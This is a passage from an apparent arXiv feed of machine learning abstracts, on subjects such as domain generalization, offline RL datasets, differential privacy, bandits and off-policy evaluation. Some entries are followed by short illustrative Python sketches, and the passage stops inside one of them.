Domain generalization aims to learn a generalization model that can perform well on unseen test domains by training only on limited source domains. However, existing domain generalization approaches often bring in prediction-irrelevant noise or require the collection of domain labels. To address these challenges, we consider the domain generalization problem from a different perspective by categorizing the underlying feature groups into domain-shared and domain-specific features. Nevertheless, the domain-specific features are difficult to identify and distinguish from the input data. In this work, we propose DomaIn-SPEcific Liberating (DISPEL), a post-processing fine-grained masking approach that can filter out undefined and indistinguishable domain-specific features in the embedding space. Specifically, DISPEL utilizes a mask generator that produces a unique mask for each input datum to filter domain-specific features. The DISPEL framework is highly flexible and can be applied to any fine-tuned model. We derive a generalization error bound that guarantees generalization performance by optimizing a designed objective loss. Experimental results on five benchmarks demonstrate that DISPEL outperforms existing methods and can further generalize various algorithms.
    Robotic Manipulation Datasets for Offline Compositional Reinforcement Learning. (arXiv:2307.07091v1 [cs.LG])
    Offline reinforcement learning (RL) is a promising direction that allows RL agents to pre-train on large datasets, avoiding the recurrence of expensive data collection. To advance the field, it is crucial to generate large-scale datasets. Compositional RL is particularly appealing for generating such large datasets, since 1) it permits creating many tasks from few components, 2) the task structure may enable trained agents to solve new tasks by combining relevant learned components, and 3) the compositional dimensions provide a notion of task relatedness. This paper provides four offline RL datasets for simulated robotic manipulation created using the 256 tasks from CompoSuite [Mendez et al., 2022a]. Each dataset is collected from an agent with a different degree of performance, and consists of 256 million transitions. We provide training and evaluation settings for assessing an agent's ability to learn compositional task policies. Our benchmarking experiments on each setting show that current offline RL methods can learn the training tasks to some extent and that compositional methods significantly outperform non-compositional methods. However, current methods are still unable to extract the tasks' compositional structure to generalize to unseen tasks, showing a need for further research in offline compositional RL.  ( 2 min )
    Exploiting Counter-Examples for Active Learning with Partial labels. (arXiv:2307.07413v1 [cs.LG])
    This paper studies a new problem, \emph{active learning with partial labels} (ALPL). In this setting, an oracle annotates the query samples with partial labels, relaxing the oracle from the demanding accurate labeling process. To address ALPL, we first build an intuitive baseline that can be seamlessly incorporated into existing AL frameworks. Though effective, this baseline is still susceptible to the \emph{overfitting}, and falls short of the representative partial-label-based samples during the query process. Drawing inspiration from human inference in cognitive science, where accurate inferences can be explicitly derived from \emph{counter-examples} (CEs), our objective is to leverage this human-like learning pattern to tackle the \emph{overfitting} while enhancing the process of selecting representative samples in ALPL. Specifically, we construct CEs by reversing the partial labels for each instance, and then we propose a simple but effective WorseNet to directly learn from this complementary pattern. By leveraging the distribution gap between WorseNet and the predictor, this adversarial evaluation manner could enhance both the performance of the predictor itself and the sample selection process, allowing the predictor to capture more accurate patterns in the data. Experimental results on five real-world datasets and four benchmark datasets show that our proposed method achieves comprehensive improvements over ten representative AL frameworks, highlighting the superiority of WorseNet. The source code will be available at \url{https://github.com/Ferenas/APLL}.
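The counter-example construction described above (reversing each instance's partial label set) can be sketched as a set complement; this is a minimal reading of the abstract, and WorseNet's training details are not shown:

```python
import numpy as np

def reverse_partial_labels(partial, n_classes):
    """Build counter-examples by complementing each instance's candidate
    label set: every class outside the partial-label set becomes a
    'worse' label that a network like WorseNet can learn from."""
    all_classes = set(range(n_classes))
    return [sorted(all_classes - set(p)) for p in partial]

# An instance annotated with candidates {0, 2} out of 4 classes
print(reverse_partial_labels([[0, 2]], n_classes=4))  # → [[1, 3]]
```

Learning from this complementary pattern gives the adversarial signal that, per the abstract, improves both the predictor and the active-learning sample selection.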
    Multiplicative update rules for accelerating deep learning training and increasing robustness. (arXiv:2307.07189v1 [cs.LG])
Even today, when Deep Learning (DL) has achieved state-of-the-art performance in a wide range of research domains, accelerating training and building robust DL models remain challenging tasks. To this end, generations of researchers have sought to develop robust methods for training DL architectures that are less sensitive to weight distributions, model architectures, and loss landscapes. However, such methods are limited to adaptive learning rate optimizers, initialization schemes, and gradient clipping, without investigating the fundamental parameter-update rule itself. Although multiplicative updates contributed significantly to the early development of machine learning and hold strong theoretical claims, to the best of our knowledge this is the first work to investigate them in the context of DL training acceleration and robustness. In this work, we propose an optimization framework that fits a wide range of optimization algorithms and enables one to apply alternative update rules. To this end, we propose a novel multiplicative update rule and extend its capabilities by combining it with a traditional additive update term in a novel hybrid update method. We claim that the proposed framework accelerates training while leading to more robust models than the traditionally used additive update rule, and we experimentally demonstrate its effectiveness on a wide range of tasks and optimization methods, ranging from convex and non-convex optimization to difficult image classification benchmarks, applying a wide range of traditionally used optimization methods and Deep Neural Network (DNN) architectures.
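A minimal sketch of a hybrid update in the spirit described above, mixing an additive gradient-descent step with a multiplicative (exponentiated-gradient-style) step; the paper's actual rule and mixing scheme may well differ:

```python
import numpy as np

def hybrid_update(w, grad, lr=0.1, mix=0.5):
    """One hybrid optimization step: a convex combination of an additive
    update (w - lr*g) and a multiplicative update (w * exp(-lr*g)).
    `mix` controls the balance between the two update families and is an
    illustrative knob, not a value from the paper."""
    additive = w - lr * grad
    multiplicative = w * np.exp(-lr * grad)
    return mix * additive + (1 - mix) * multiplicative
```

On the toy objective f(w) = w^2 (gradient 2w), repeatedly applying this step drives w toward the minimizer at zero, which is the basic sanity check for any such rule.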
    AnyStar: Domain randomized universal star-convex 3D instance segmentation. (arXiv:2307.07044v1 [cs.CV])
    Star-convex shapes arise across bio-microscopy and radiology in the form of nuclei, nodules, metastases, and other units. Existing instance segmentation networks for such structures train on densely labeled instances for each dataset, which requires substantial and often impractical manual annotation effort. Further, significant reengineering or finetuning is needed when presented with new datasets and imaging modalities due to changes in contrast, shape, orientation, resolution, and density. We present AnyStar, a domain-randomized generative model that simulates synthetic training data of blob-like objects with randomized appearance, environments, and imaging physics to train general-purpose star-convex instance segmentation networks. As a result, networks trained using our generative model do not require annotated images from unseen datasets. A single network trained on our synthesized data accurately 3D segments C. elegans and P. dumerilii nuclei in fluorescence microscopy, mouse cortical nuclei in micro-CT, zebrafish brain nuclei in EM, and placental cotyledons in human fetal MRI, all without any retraining, finetuning, transfer learning, or domain adaptation. Code is available at https://github.com/neel-dey/AnyStar.  ( 2 min )
    DreamTeacher: Pretraining Image Backbones with Deep Generative Models. (arXiv:2307.07487v1 [cs.CV])
    In this work, we introduce a self-supervised feature representation learning framework DreamTeacher that utilizes generative networks for pre-training downstream image backbones. We propose to distill knowledge from a trained generative model into standard image backbones that have been well engineered for specific perception tasks. We investigate two types of knowledge distillation: 1) distilling learned generative features onto target image backbones as an alternative to pretraining these backbones on large labeled datasets such as ImageNet, and 2) distilling labels obtained from generative networks with task heads onto logits of target backbones. We perform extensive analyses on multiple generative models, dense prediction benchmarks, and several pre-training regimes. We empirically find that our DreamTeacher significantly outperforms existing self-supervised representation learning approaches across the board. Unsupervised ImageNet pre-training with DreamTeacher leads to significant improvements over ImageNet classification pre-training on downstream datasets, showcasing generative models, and diffusion generative models specifically, as a promising approach to representation learning on large, diverse datasets without requiring manual annotation.
    A Surrogate Data Assimilation Model for the Estimation of Dynamical System in a Limited Area. (arXiv:2307.07178v1 [math.NA])
    We propose a novel learning-based surrogate data assimilation (DA) model for efficient state estimation in a limited area. Our model employs a feedforward neural network for online computation, eliminating the need for integrating high-dimensional limited-area models. This approach offers significant computational advantages over traditional DA algorithms. Furthermore, our method avoids the requirement of lateral boundary conditions for the limited-area model in both online and offline computations. The design of our surrogate DA model is built upon a robust theoretical framework that leverages two fundamental concepts: observability and effective region. The concept of observability enables us to quantitatively determine the optimal amount of observation data necessary for accurate DA. Meanwhile, the concept of effective region substantially reduces the computational burden associated with computing observability and generating training data.
    Composition-contrastive Learning for Sentence Embeddings. (arXiv:2307.07380v1 [cs.CL])
    Vector representations of natural language are ubiquitous in search applications. Recently, various methods based on contrastive learning have been proposed to learn textual representations from unlabelled data; by maximizing alignment between minimally-perturbed embeddings of the same text, and encouraging a uniform distribution of embeddings across a broader corpus. Differently, we propose maximizing alignment between texts and a composition of their phrasal constituents. We consider several realizations of this objective and elaborate the impact on representations in each case. Experimental results on semantic textual similarity tasks show improvements over baselines that are comparable with state-of-the-art approaches. Moreover, this work is the first to do so without incurring costs in auxiliary training objectives or additional network parameters.
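The composition objective can be illustrated by scoring alignment between a text embedding and a composition of its phrasal constituents' embeddings; mean-pooling is an assumed choice of composition here, and a contrastive loss would maximize this score against in-batch negatives:

```python
import numpy as np

def composition_alignment(text_emb, phrase_embs):
    """Cosine alignment between a full-text embedding and the mean of its
    phrase embeddings. In a contrastive setup this plays the role of the
    positive-pair similarity."""
    comp = np.mean(phrase_embs, axis=0)
    return float(text_emb @ comp /
                 (np.linalg.norm(text_emb) * np.linalg.norm(comp)))
```

The abstract's point is that composing constituents replaces the usual minimally-perturbed-copy positive, at no extra parameter or auxiliary-objective cost.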
    Bootstrapping Vision-Language Learning with Decoupled Language Pre-training. (arXiv:2307.07063v1 [cs.CV])
    We present a novel methodology aimed at optimizing the application of frozen large language models (LLMs) for resource-intensive vision-language (VL) pre-training. The current paradigm uses visual features as prompts to guide language models, with a focus on determining the most relevant visual features for corresponding text. Our approach diverges by concentrating on the language component, specifically identifying the optimal prompts to align with visual features. We introduce the Prompt-Transformer (P-Former), a model that predicts these ideal prompts, which is trained exclusively on linguistic data, bypassing the need for image-text pairings. This strategy subtly bifurcates the end-to-end VL training process into an additional, separate stage. Our experiments reveal that our framework significantly enhances the performance of a robust image-to-text baseline (BLIP-2), and effectively narrows the performance gap between models trained with either 4M or 129M image-text pairs. Importantly, our framework is modality-agnostic and flexible in terms of architectural design, as validated by its successful application in a video learning task using varied base modules. The code is available at https://github.com/yiren-jian/BLIText  ( 2 min )
    How Different Is Stereotypical Bias Across Languages?. (arXiv:2307.07331v1 [cs.CL])
    Recent studies have demonstrated how to assess the stereotypical bias in pre-trained English language models. In this work, we extend this branch of research in multiple different dimensions by systematically investigating (a) mono- and multilingual models of (b) different underlying architectures with respect to their bias in (c) multiple different languages. To that end, we make use of the English StereoSet data set (Nadeem et al., 2021), which we semi-automatically translate into German, French, Spanish, and Turkish. We find that it is of major importance to conduct this type of analysis in a multilingual setting, as our experiments show a much more nuanced picture as well as notable differences from the English-only analysis. The main takeaways from our analysis are that mGPT-2 (partly) shows surprising anti-stereotypical behavior across languages, English (monolingual) models exhibit the strongest bias, and the stereotypes reflected in the data set are least present in Turkish models. Finally, we release our codebase alongside the translated data sets and practical guidelines for the semi-automatic translation to encourage a further extension of our work to other languages.
    Signed iterative random forests to identify enhancer-associated transcription factor binding. (arXiv:1810.07287v2 [stat.ML] UPDATED)
    Standard ChIP-seq peak calling pipelines seek to differentiate biochemically reproducible signals of individual genomic elements from background noise. However, reproducibility alone does not imply functional regulation (e.g., enhancer activation, alternative splicing). Here we present a general-purpose, interpretable machine learning method: signed iterative random forests (siRF), which we use to infer regulatory interactions among transcription factors and functional binding signatures surrounding enhancer elements in Drosophila melanogaster.
    Adaptive Linear Estimating Equations. (arXiv:2307.07320v1 [math.ST])
Sequential data collection has emerged as a widely adopted technique for enhancing the efficiency of data gathering processes. Despite its advantages, such a data collection mechanism often introduces complexities into the statistical inference procedure. For instance, the ordinary least squares (OLS) estimator in an adaptive linear regression model can exhibit non-normal asymptotic behavior, posing challenges for accurate inference and interpretation. In this paper, we propose a general method for constructing a debiased estimator that remedies this issue. It makes use of the idea of adaptive linear estimating equations, and we establish theoretical guarantees of asymptotic normality, supplemented by discussions on achieving near-optimal asymptotic variance. A salient feature of our estimator is that, in the context of multi-armed bandits, it retains the non-asymptotic performance of the least squares estimator while obtaining the asymptotic normality property. Consequently, this work helps connect two fruitful paradigms of adaptive inference: a) non-asymptotic inference using concentration inequalities and b) asymptotic inference via asymptotic normality.
    DoCoFL: Downlink Compression for Cross-Device Federated Learning. (arXiv:2302.00543v2 [cs.LG] UPDATED)
    Many compression techniques have been proposed to reduce the communication overhead of Federated Learning training procedures. However, these are typically designed for compressing model updates, which are expected to decay throughout training. As a result, such methods are inapplicable to downlink (i.e., from the parameter server to clients) compression in the cross-device setting, where heterogeneous clients $\textit{may appear only once}$ during training and thus must download the model parameters. Accordingly, we propose $\textsf{DoCoFL}$ -- a new framework for downlink compression in the cross-device setting. Importantly, $\textsf{DoCoFL}$ can be seamlessly combined with many uplink compression schemes, rendering it suitable for bi-directional compression. Through extensive evaluation, we show that $\textsf{DoCoFL}$ offers significant bi-directional bandwidth reduction while achieving competitive accuracy to that of a baseline without any compression.  ( 2 min )
    $\Phi$-DVAE: Physics-Informed Dynamical Variational Autoencoders for Unstructured Data Assimilation. (arXiv:2209.15609v2 [stat.ML] UPDATED)
    Incorporating unstructured data into physical models is a challenging problem that is emerging in data assimilation. Traditional approaches focus on well-defined observation operators whose functional forms are typically assumed to be known. This prevents these methods from achieving a consistent model-data synthesis in configurations where the mapping from data-space to model-space is unknown. To address these shortcomings, in this paper we develop a physics-informed dynamical variational autoencoder ($\Phi$-DVAE) to embed diverse data streams into time-evolving physical systems described by differential equations. Our approach combines a standard, possibly nonlinear, filter for the latent state-space model and a VAE, to assimilate the unstructured data into the latent dynamical system. Unstructured data, in our example systems, comes in the form of video data and velocity field measurements, however the methodology is suitably generic to allow for arbitrary unknown observation operators. A variational Bayesian framework is used for the joint estimation of the encoding, latent states, and unknown system parameters. To demonstrate the method, we provide case studies with the Lorenz-63 ordinary differential equation, and the advection and Korteweg-de Vries partial differential equations. Our results, with synthetic data, show that $\Phi$-DVAE provides a data efficient dynamics encoding methodology which is competitive with standard approaches. Unknown parameters are recovered with uncertainty quantification, and unseen data are accurately predicted.  ( 3 min )
    Linear Classification of Neural Manifolds with Correlated Variability. (arXiv:2211.14961v2 [q-bio.NC] UPDATED)
    Understanding how the statistical and geometric properties of neural activity relate to performance is a key problem in theoretical neuroscience and deep learning. Here, we calculate how correlations between object representations affect the capacity, a measure of linear separability. We show that for spherical object manifolds, introducing correlations between centroids effectively pushes the spheres closer together, while introducing correlations between the axes effectively shrinks their radii, revealing a duality between correlations and geometry with respect to the problem of classification. We then apply our results to accurately estimate the capacity of deep network data.  ( 2 min )
    Stream-based active learning with linear models. (arXiv:2207.09874v5 [stat.ML] UPDATED)
    The proliferation of automated data collection schemes and the advances in sensorics are increasing the amount of data we are able to monitor in real-time. However, given the high annotation costs and the time required by quality inspections, data is often available in an unlabeled form. This is fostering the use of active learning for the development of soft sensors and predictive models. In production, instead of performing random inspections to obtain product information, labels are collected by evaluating the information content of the unlabeled data. Several query strategy frameworks for regression have been proposed in the literature but most of the focus has been dedicated to the static pool-based scenario. In this work, we propose a new strategy for the stream-based scenario, where instances are sequentially offered to the learner, which must instantaneously decide whether to perform the quality check to obtain the label or discard the instance. The approach is inspired by the optimal experimental design theory and the iterative aspect of the decision-making process is tackled by setting a threshold on the informativeness of the unlabeled data points. The proposed approach is evaluated using numerical simulations and the Tennessee Eastman Process simulator. The results confirm that selecting the examples suggested by the proposed algorithm allows for a faster reduction in the prediction error.  ( 3 min )
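The decision rule the abstract describes, thresholding the informativeness of each streamed instance, can be sketched in the spirit of optimal experimental design. In the toy below, informativeness is the predictive leverage x^T A^{-1} x under the current design matrix; the threshold value and regularization are illustrative assumptions, not the paper's exact rule.

```python
import numpy as np

rng = np.random.default_rng(0)
d, tau = 5, 1.0
A = 0.1 * np.eye(d)              # regularized information matrix of the design
queried = 0

for _ in range(200):
    x = rng.normal(size=d)                      # instance arriving from the stream
    informativeness = x @ np.linalg.solve(A, x)  # predictive leverage of x
    if informativeness > tau:    # worth a quality check: acquire the label
        A += np.outer(x, x)      # fold the new point into the design
        queried += 1

print(f"queried {queried} of 200 streamed instances")
```

Early points are almost always queried; as the design fills out, the leverage of typical points drops below the threshold and inspections become rare, which is the intended budget-saving behavior.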
    Differentially Private Stochastic Gradient Descent with Low-Noise. (arXiv:2209.04188v2 [stat.ML] UPDATED)
    Modern machine learning algorithms aim to extract fine-grained information from data to provide accurate predictions, which often conflicts with the goal of privacy protection. This paper addresses the practical and theoretical importance of developing privacy-preserving machine learning algorithms that ensure good performance while preserving privacy. In this paper, we focus on the privacy and utility (measured by excess risk bounds) performances of differentially private stochastic gradient descent (SGD) algorithms in the setting of stochastic convex optimization. Specifically, we examine the pointwise problem in the low-noise setting for which we derive sharper excess risk bounds for the differentially private SGD algorithm. In the pairwise learning setting, we propose a simple differentially private SGD algorithm based on gradient perturbation. Furthermore, we develop novel utility bounds for the proposed algorithm, proving that it achieves optimal excess risk rates even for non-smooth losses. Notably, we establish fast learning rates for privacy-preserving pairwise learning under the low-noise condition, which is the first of its kind.  ( 2 min )
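The gradient-perturbation mechanism the abstract builds on is standard enough to sketch: per-example gradients are clipped to an l2 bound C and Gaussian noise calibrated to C is added. The clip bound, noise multiplier, learning rate, and least-squares model below are illustrative assumptions, and no privacy accounting is performed.

```python
import numpy as np

rng = np.random.default_rng(0)

def private_step(w, X, y, lr=0.1, C=1.0, noise_mult=1.0):
    grads = (X @ w - y)[:, None] * X              # per-example squared-loss gradients
    norms = np.linalg.norm(grads, axis=1, keepdims=True)
    grads = grads / np.maximum(1.0, norms / C)    # clip each gradient to norm <= C
    noise = noise_mult * C * rng.normal(size=w.shape)
    g = (grads.sum(axis=0) + noise) / len(X)      # noisy average gradient
    return w - lr * g

X = rng.normal(size=(256, 4))
w_true = np.array([1.0, -2.0, 0.5, 0.0])
y = X @ w_true
w = np.zeros(4)
for _ in range(300):
    w = private_step(w, X, y)
print("parameter error:", np.linalg.norm(w - w_true))
```

In the low-noise regime the clipped, perturbed iterates still converge close to the unconstrained solution, which is the utility behavior the excess risk bounds quantify.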
    On Statistical Discrimination as a Failure of Social Learning: A Multi-Armed Bandit Approach. (arXiv:2010.01079v6 [econ.TH] UPDATED)
    We analyze statistical discrimination in hiring markets using a multi-armed bandit model. Myopic firms face workers arriving with heterogeneous observable characteristics. The association between the worker's skill and characteristics is unknown ex ante; thus, firms need to learn it. Laissez-faire causes perpetual underestimation: minority workers are rarely hired, and therefore, the underestimation tends to persist. Even a marginal imbalance in the population ratio frequently results in perpetual underestimation. We propose two policy solutions: a novel subsidy rule (the hybrid mechanism) and the Rooney Rule. Our results indicate that temporary affirmative actions effectively alleviate discrimination stemming from insufficient data.  ( 2 min )
    Hypothesis Transfer Learning with Surrogate Classification Losses: Generalization Bounds through Algorithmic Stability. (arXiv:2305.19694v2 [stat.ML] UPDATED)
Hypothesis transfer learning (HTL) contrasts with domain adaptation by allowing a previous task, named the source, to be leveraged in a new one, the target, without requiring access to the source data. Indeed, HTL relies only on a hypothesis learnt from the source data, relieving the burden of expensive data storage and providing great practical benefits. Hence, HTL is highly beneficial for real-world applications relying on big data. The analysis of such a method from a theoretical perspective faces multiple challenges, particularly in classification tasks. This paper deals with this problem by studying the learning theory of HTL through algorithmic stability, an attractive theoretical framework for the analysis of machine learning algorithms. In particular, we are interested in the statistical behaviour of the regularized empirical risk minimizers in the case of binary classification. Our stability analysis provides learning guarantees under mild assumptions. Consequently, we derive several complexity-free generalization bounds for essential statistical quantities like the training error, the excess risk and cross-validation estimates. These refined bounds allow us to understand the benefits of transfer learning and to compare the behaviour of standard losses in different scenarios, leading to valuable insights for practitioners.  ( 2 min )
    Seismic Data Interpolation based on Denoising Diffusion Implicit Models with Resampling. (arXiv:2307.04226v2 [physics.geo-ph] UPDATED)
The incompleteness of the seismic data caused by missing traces along the spatial extension is a common issue in seismic acquisition due to the existence of obstacles and economic constraints, which severely impairs the imaging quality of subsurface geological structures. Recently, deep learning-based seismic interpolation methods have attained promising progress, but achieving stable training of generative adversarial networks is not easy, and performance degradation is usually notable if the missing patterns in the testing and training do not match. In this paper, we propose a novel seismic denoising diffusion implicit model with resampling. The model training is established on the denoising diffusion probabilistic model, where U-Net is equipped with the multi-head self-attention to match the noise in each step. The cosine noise schedule, serving as the global noise configuration, promotes the high utilization of known trace information by accelerating the passage of the excessive noise stages. The model inference utilizes the denoising diffusion implicit model, conditioning on the known traces, to enable high-quality interpolation with fewer diffusion steps. To enhance the coherency between the known traces and the missing traces within each reverse step, the inference process integrates a resampling strategy to achieve a recap of information from the previously interpolated traces. Extensive experiments conducted on synthetic and field seismic data validate the superiority of our model and its robustness to various missing patterns. In addition, uncertainty quantification and ablation studies are also investigated.  ( 3 min )
    Implicit regularization in AI meets generalized hardness of approximation in optimization -- Sharp results for diagonal linear networks. (arXiv:2307.07410v1 [cs.LG])
    Understanding the implicit regularization imposed by neural network architectures and gradient based optimization methods is a key challenge in deep learning and AI. In this work we provide sharp results for the implicit regularization imposed by the gradient flow of Diagonal Linear Networks (DLNs) in the over-parameterized regression setting and, potentially surprisingly, link this to the phenomenon of phase transitions in generalized hardness of approximation (GHA). GHA generalizes the phenomenon of hardness of approximation from computer science to, among others, continuous and robust optimization. It is well-known that the $\ell^1$-norm of the gradient flow of DLNs with tiny initialization converges to the objective function of basis pursuit. We improve upon these results by showing that the gradient flow of DLNs with tiny initialization approximates minimizers of the basis pursuit optimization problem (as opposed to just the objective function), and we obtain new and sharp convergence bounds w.r.t.\ the initialization size. Non-sharpness of our results would imply that the GHA phenomenon would not occur for the basis pursuit optimization problem -- which is a contradiction -- thus implying sharpness. Moreover, we characterize $\textit{which}$ $\ell_1$ minimizer of the basis pursuit problem is chosen by the gradient flow whenever the minimizer is not unique. Interestingly, this depends on the depth of the DLN.  ( 3 min )
    On Interpolating Experts and Multi-Armed Bandits. (arXiv:2307.07264v1 [cs.LG])
    Learning with expert advice and multi-armed bandit are two classic online decision problems which differ on how the information is observed in each round of the game. We study a family of problems interpolating the two. For a vector $\mathbf{m}=(m_1,\dots,m_K)\in \mathbb{N}^K$, an instance of $\mathbf{m}$-MAB indicates that the arms are partitioned into $K$ groups and the $i$-th group contains $m_i$ arms. Once an arm is pulled, the losses of all arms in the same group are observed. We prove tight minimax regret bounds for $\mathbf{m}$-MAB and design an optimal PAC algorithm for its pure exploration version, $\mathbf{m}$-BAI, where the goal is to identify the arm with minimum loss with as few rounds as possible. We show that the minimax regret of $\mathbf{m}$-MAB is $\Theta\left(\sqrt{T\sum_{k=1}^K\log (m_k+1)}\right)$ and the minimum number of pulls for an $(\epsilon,0.05)$-PAC algorithm of $\mathbf{m}$-BAI is $\Theta\left(\frac{1}{\epsilon^2}\cdot \sum_{k=1}^K\log (m_k+1)\right)$. Both our upper bounds and lower bounds for $\mathbf{m}$-MAB can be extended to a more general setting, namely the bandit with graph feedback, in terms of the clique cover and related graph parameters. As consequences, we obtained tight minimax regret bounds for several families of feedback graphs.  ( 2 min )
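The minimax rate Θ(sqrt(T Σ_k log(m_k + 1))) stated in the abstract cleanly interpolates the two classic settings, which can be checked by plugging in the extremes: K singleton groups recover bandit-style feedback, while a single group of K arms recovers full-information (experts) feedback. The horizon and arm counts below are illustrative choices.

```python
import math

def mmab_rate(T, groups):
    # Evaluate sqrt(T * sum_k log(m_k + 1)) for group sizes m_k.
    return math.sqrt(T * sum(math.log(m + 1) for m in groups))

T, K = 10_000, 16
bandit_like = mmab_rate(T, [1] * K)   # K groups of 1 arm: ~ sqrt(T * K * log 2)
experts_like = mmab_rate(T, [K])      # 1 group of K arms: ~ sqrt(T * log(K + 1))

print(bandit_like, experts_like)
```

As expected, richer feedback (one big group) yields the much smaller logarithmic dependence on the number of arms.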
    Performance of $\ell_1$ Regularization for Sparse Convex Optimization. (arXiv:2307.07405v1 [cs.LG])
    Despite widespread adoption in practice, guarantees for the LASSO and Group LASSO are strikingly lacking in settings beyond statistical problems, and these algorithms are usually considered to be a heuristic in the context of sparse convex optimization on deterministic inputs. We give the first recovery guarantees for the Group LASSO for sparse convex optimization with vector-valued features. We show that if a sufficiently large Group LASSO regularization is applied when minimizing a strictly convex function $l$, then the minimizer is a sparse vector supported on vector-valued features with the largest $\ell_2$ norm of the gradient. Thus, repeating this procedure selects the same set of features as the Orthogonal Matching Pursuit algorithm, which admits recovery guarantees for any function $l$ with restricted strong convexity and smoothness via weak submodularity arguments. This answers open questions of Tibshirani et al. and Yasuda et al. Our result is the first to theoretically explain the empirical success of the Group LASSO for convex functions under general input instances assuming only restricted strong convexity and smoothness. Our result also generalizes provable guarantees for the Sequential Attention algorithm, which is a feature selection algorithm inspired by the attention mechanism proposed by Yasuda et al. As an application of our result, we give new results for the column subset selection problem, which is well-studied when the loss is the Frobenius norm or other entrywise matrix losses. We give the first result for general loss functions for this problem that requires only restricted strong convexity and smoothness.  ( 3 min )
    Deep reinforcement learning for the dynamic vehicle dispatching problem: An event-based approach. (arXiv:2307.07508v1 [cs.AI])
The dynamic vehicle dispatching problem corresponds to deciding which vehicles to assign to requests that arise stochastically over time and space. It emerges in diverse areas, such as in the assignment of trucks to loads to be transported; in emergency systems; and in ride-hailing services. In this paper, we model the problem as a semi-Markov decision process, which allows us to treat time as continuous. In this setting, decision epochs coincide with discrete events whose time intervals are random. We argue that an event-based approach substantially reduces the combinatorial complexity of the decision space and overcomes other limitations of discrete-time models often proposed in the literature. In order to test our approach, we develop a new discrete-event simulator and use double deep Q-learning to train our decision agents. Numerical experiments are carried out in realistic scenarios using data from New York City. We compare the policies obtained through our approach with heuristic policies often used in practice. Results show that our policies exhibit better average waiting times, cancellation rates and total service times, with a reduction in average waiting times of up to 50% relative to the other tested heuristic policies.  ( 2 min )
    Fully probabilistic deep models for forward and inverse problems in parametric PDEs. (arXiv:2208.04856v2 [stat.ML] UPDATED)
    We introduce a physics-driven deep latent variable model (PDDLVM) to learn simultaneously parameter-to-solution (forward) and solution-to-parameter (inverse) maps of parametric partial differential equations (PDEs). Our formulation leverages conventional PDE discretization techniques, deep neural networks, probabilistic modelling, and variational inference to assemble a fully probabilistic coherent framework. In the posited probabilistic model, both the forward and inverse maps are approximated as Gaussian distributions with a mean and covariance parameterized by deep neural networks. The PDE residual is assumed to be an observed random vector of value zero, hence we model it as a random vector with a zero mean and a user-prescribed covariance. The model is trained by maximizing the probability, that is the evidence or marginal likelihood, of observing a residual of zero by maximizing the evidence lower bound (ELBO). Consequently, the proposed methodology does not require any independent PDE solves and is physics-informed at training time, allowing the real-time solution of PDE forward and inverse problems after training. The proposed framework can be easily extended to seamlessly integrate observed data to solve inverse problems and to build generative models. We demonstrate the efficiency and robustness of our method on finite element discretized parametric PDE problems such as linear and nonlinear Poisson problems, elastic shells with complex 3D geometries, and time-dependent nonlinear and inhomogeneous PDEs using a physics-informed neural network (PINN) discretization. We achieve up to three orders of magnitude speed-up after training compared to traditional finite element method (FEM), while outputting coherent uncertainty estimates.  ( 3 min )
    Identifiability Guarantees for Causal Disentanglement from Soft Interventions. (arXiv:2307.06250v2 [stat.ML] UPDATED)
    Causal disentanglement aims to uncover a representation of data using latent variables that are interrelated through a causal model. Such a representation is identifiable if the latent model that explains the data is unique. In this paper, we focus on the scenario where unpaired observational and interventional data are available, with each intervention changing the mechanism of a latent variable. When the causal variables are fully observed, statistically consistent algorithms have been developed to identify the causal model under faithfulness assumptions. We here show that identifiability can still be achieved with unobserved causal variables, given a generalized notion of faithfulness. Our results guarantee that we can recover the latent causal model up to an equivalence class and predict the effect of unseen combinations of interventions, in the limit of infinite data. We implement our causal disentanglement framework by developing an autoencoding variational Bayes algorithm and apply it to the problem of predicting combinatorial perturbation effects in genomics.  ( 2 min )
    Unpacking the Black Box: Regulating Algorithmic Decisions. (arXiv:2110.03443v2 [econ.GN] UPDATED)
    We show how to optimally regulate prediction algorithms in a world where an agent uses complex 'black-box' prediction functions to make decisions such as lending, medical testing, or hiring, and where a principal is limited in how much she can learn about the agent's black-box model. We show that limiting agents to prediction functions that are simple enough to be fully transparent is inefficient as long as the misalignment is limited and first-best prediction functions are sufficiently complex. Algorithmic audits can improve welfare, but the gains depend on the design of the audit tools. Tools that focus on minimizing overall information loss, the focus of many explainer tools, will generally be inefficient since they focus on explaining the average behavior of the prediction function. Targeted tools that focus on the source of incentive misalignment, e.g., excess false positives or racial disparities, can provide second-best solutions. We provide empirical support for our theoretical findings using an application in consumer lending, where we document that complex models regulated based on context-specific explanation tools outperform simple, fully transparent models. This gain from complex models represents a Pareto improvement across our empirical applications that are preferred both by the lender and from the perspective of the financial regulator.  ( 2 min )
    Alternating the Population and Control Neural Networks to Solve High-Dimensional Stochastic Mean-Field Games. (arXiv:2002.10113v4 [cs.LG] UPDATED)
    We present APAC-Net, an alternating population and agent control neural network for solving stochastic mean field games (MFGs). Our algorithm is geared toward high-dimensional instances of MFGs that are beyond reach with existing solution methods. We achieve this in two steps. First, we take advantage of the underlying variational primal-dual structure that MFGs exhibit and phrase it as a convex-concave saddle point problem. Second, we parameterize the value and density functions by two neural networks, respectively. By phrasing the problem in this manner, solving the MFG can be interpreted as a special case of training a generative adversarial network (GAN). We show the potential of our method on up to 100-dimensional MFG problems.  ( 2 min )
    Leveraging Factored Action Spaces for Off-Policy Evaluation. (arXiv:2307.07014v1 [cs.LG])
    Off-policy evaluation (OPE) aims to estimate the benefit of following a counterfactual sequence of actions, given data collected from executed sequences. However, existing OPE estimators often exhibit high bias and high variance in problems involving large, combinatorial action spaces. We investigate how to mitigate this issue using factored action spaces i.e. expressing each action as a combination of independent sub-actions from smaller action spaces. This approach facilitates a finer-grained analysis of how actions differ in their effects. In this work, we propose a new family of "decomposed" importance sampling (IS) estimators based on factored action spaces. Given certain assumptions on the underlying problem structure, we prove that the decomposed IS estimators have less variance than their original non-decomposed versions, while preserving the property of zero bias. Through simulations, we empirically verify our theoretical results, probing the validity of various assumptions. Provided with a technique that can derive the action space factorisation for a given problem, our work shows that OPE can be improved "for free" by utilising this inherent problem structure.  ( 2 min )
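The core idea of a decomposed importance-sampling weight is easy to illustrate when both the behavior and evaluation policies factorize across sub-actions: the per-action weight becomes a product of small per-factor ratios. The two-sub-action bandit, its policies, and its additive reward below are illustrative assumptions, not the paper's construction.

```python
import numpy as np

rng = np.random.default_rng(0)
pb = [np.array([0.5, 0.5]), np.array([0.7, 0.3])]   # behavior marginals per sub-action
pe = [np.array([0.9, 0.1]), np.array([0.2, 0.8])]   # evaluation marginals per sub-action

n = 200_000
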